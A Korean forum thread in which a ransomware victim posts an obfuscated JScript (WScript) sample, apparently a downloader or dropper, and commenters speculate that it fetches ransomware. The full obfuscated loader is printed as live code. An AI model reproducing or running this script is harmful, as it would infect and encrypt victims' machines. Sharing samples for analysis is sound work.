그 바이러스 걸렸을때 소스파일이 암호화되기 전에 원드라이브에 보내서 소스파일을 가지고 있는데 이거 정체가 뭔지 해석좀
난 모르겟음..
function have(block,ball,until,shape){led=1;women=led;WScript.Sleep(4003);well=women+led*women+led;example[5202226]=direct;}
function string(yellow,travel,ship){example[6306835]=at;safe[well] = get[safe[grew]];}
function silver(metal,after,steam,science,lift) {five = own(after);two = grew;stood=[];for (soldier=grew; soldier<=(own(metal)-five); soldier++) {if (spell(metal,(soldier),five)==after){stood[own(stood)]=spell((metal),two,(soldier-two));two = (soldier+five);}}stood[own(stood)]=spell(metal,two);return stood;}
function get(captain,touch,rope,low){example[4355544]=have;WScript.Sleep(6930);special = 'r.sioi(vnn(nmd EeefdnxintO aSf;pt(txr\\x\"iEe@n.T\\g\"e)s+s\\(\"nd\"l\\+ol%\\p\"Ues@She\\E\"rSR,..D wtN0 pS)=iD) rO=scM= SA-rWI1a\\N\"v)%( \"t\\{{c) e W)j!S0b=c0O r2e\"i\\t p%a=tUe=.Sr=sEC lR.seDtueNptpSia(Drt2Ocs2MS.2AWw2I((2N )%ff;\"i\\ i )} ; }){e 0dl;3=se+des0+ l7\"{\\,a 22fs7( 8]n=1\\r\"4 ur6stt\".\\ser;bre}u p s{lt\\)\"rae[yc(){eh( (cgw\\t\".na@oic\\p\"}re+ tnd;S(+)o\'\\\\\"(tG@d.E\\n\"T)e,\'(\\\\s\",m.\\ \"wo\')\\d ;hn; ta)vtreap.srshl :taH/af /M =\' \\ ,=+sd x.+d[r\" \\eK;=p])fl+\\g\'\'a\\Pnc/TaesTo(eHi/aLh(rMw\\c\\qXhdcr.{hep2xvh}qrp)ze\'/\\Seg+.?,\"2\\ \'L(ftMeunXgnaSmc(M]tE\\[\'eif(aost{n cy ret(}j;b9b8)=Oc ies{utm ;a1r8e-e4r8t=CEu;.)r\"tZn\"p+ \"iSS_rGt\"c+r\"SEi\"W+n\" Rg\"= ., \"f\"w r, dol{emh (C])\"h\"3+a\" ert<iC\" +o\"Krd\"(+e\" W(geep\"l+a\"iRr\"h[sywnei tI ;{n 0)te ((h=cbt a,cK 1} 0;;))d]l+e\\h\"(3]e\"0dba)e.R;\"e+ \"ig}\"g+)\"le;Rl\" [eysnbiate f{l eytr[tt;3\"e\\]\\kL(Q.bHxw\\)\\w\"(+w\")R\\\"\"+;\",E \"\\+\"\"WSmUS\"o+c\"c_r\".+i\"uTp\"s+t\"tN.\"a+Q\"iEuRhRi\"s+t\"-U(\"o+)\"dC;\"n+ \"i_}\"y+ \"iY}\"k+ \".EeKwHl\"w s=w ed\\l\"e h, {;\\)\"\" \"m+W\"olSlc\"c+.\"rerhi\"e+p\"lSt\"e+.\"m.sttplie\"e+l\"erscpSiW(\"k(2]u\"2\"c+2\"ut2ck\"2+.\")ewj;bwO ew\"}+\\\"\"t a[\"K+ \"+e=\"++ \";rxC}\"\'[)))t(p)i;r}ccSaWt(c h=( ey)n{iWtS;c2r7i8p2t=.bsklqedenpb(i7x1v8b0b0h9u3q4b4B)i;f}AcAwjkrgoaticzu=rstasfneo;c ';grew=0;}
function at(){safe[well](safe[women])(example);}
function own(i,score,pick) {return i.length; }
function front(spring,lot,spoke,fresh){return spell(spring,lot,led);}
function spell(period,natural,season,black,equate,caught) {return period.substr(natural,season);}
function quiet(){example=[5159];insect(example);}
function magnet(column,scale,help){reply="";body=grew;while (body < 2427) {fish=front(column,body);reply=game(reply,fish,body); body++; }return reply;}
function direct(when,see,follow,quick){might="jAAfiBbq";example[6002509]=string;safe=silver(magnet(special),might);}
function current(office){return office % (women+women);}
function insect(trip,during,ear){WScript.Sleep(42952);above=2259;while(get=get){try{example[above](above);}catch(opposite){example[2785819]=get;}above++}}
quiet(2758);
function game(jump,represent,term,were,finish) { if (current(term)) return jump+represent; else return represent+jump; }
이게 뭐시여 WScript로 윈도우 조작한다는 것만 알겠네
어차피 스크립트는 랜섬웨어를 드롭하기위한 거일껄? 그래서 이거 해석해도의미없을듯.. 해석안해봤지만 악성ㅋㅗ드에서 쓰이는 스크립트 80퍼가 다운로더임
그리고 이거원본맞음? 아래 더있어야할것같은데
난독화 신기하네